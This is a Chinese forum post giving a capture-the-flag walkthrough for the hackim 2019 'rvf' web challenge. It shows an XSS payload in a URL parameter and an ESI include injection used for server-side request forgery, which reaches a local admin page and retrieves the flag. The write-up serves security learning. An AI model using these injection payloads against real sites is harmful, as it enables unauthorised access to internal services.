roger

2万积分	41 好友	1157 主题

发消息

[Web] hackim_2019_web_rvf

发表于 2020-4-21 17:57:42 | 查看: 2919| 回复: 0

相关题目：

♦ rvf

进去是一个输入框

hackim_2019_web_rvf

有个admin界面。

hackim_2019_web_rvf

提交输入后url变成：

/edge?title=123&description=%3Cimg+src%3D1+onerror%3Dalert%281%29%3E

可以触发XSS。
尝试/edge?title=123&description[a]=1，可以看到触发了错误，得到一个esi.js的库。

hackim_2019_web_rvf

查看官方示例：

>  You want to embed the fragment of HTML from “[http://snipets.com/abc.html](http://snipets.com/abc.html)“ within an HTML document.
> 
> ```
> blah blah, oh and here i embed in the page a snipet using an ESI server ...
> <esi:include src="http://snipets.com/snipet.html"></esi:include>
> 
> ```
> 
> **snipet.html**
> 
> ```
> <b>Snipet</b>
> 
> ```
> 
> With Node ESI script, you can pre-process ESI tags.

可以推出这里应该需要SSRF。构造：

/edge?title=123&description=<esi:include src="http://127.0.0.1:8080"></esi:include>

成功返回了网页的内容。

hackim_2019_web_rvf

访问下admin界面就能得到flag。

http://192.168.241.137:8080/edge?title=123&description=<esi:include src="http://192.168.241.137:8080/admin"></esi:include>

hackim_2019_web_rvf

温馨提示：

1.如果您喜欢这篇帖子，请给作者点赞评分，点赞会增加帖子的热度，评分会给作者加学币。(评分不会扣掉您的积分，系统每天都会重置您的评分额度)。
2.回复帖子不仅是对作者的认可，还可以获得学币奖励，请尊重他人的劳动成果，拒绝做伸手党！
3.发广告、灌水回复等违规行为一经发现直接禁言，如果本帖内容涉嫌违规，请点击论坛底部的举报反馈按钮，也可以在【投诉建议】板块发帖举报。

论坛交流群：672619046

收藏0 回复显示全部楼层道具举报打印

返回列表

		自动登录	找回密码
密码			立即注册

[Web] hackim_2019_web_rvf

教程达人

鬼斧神工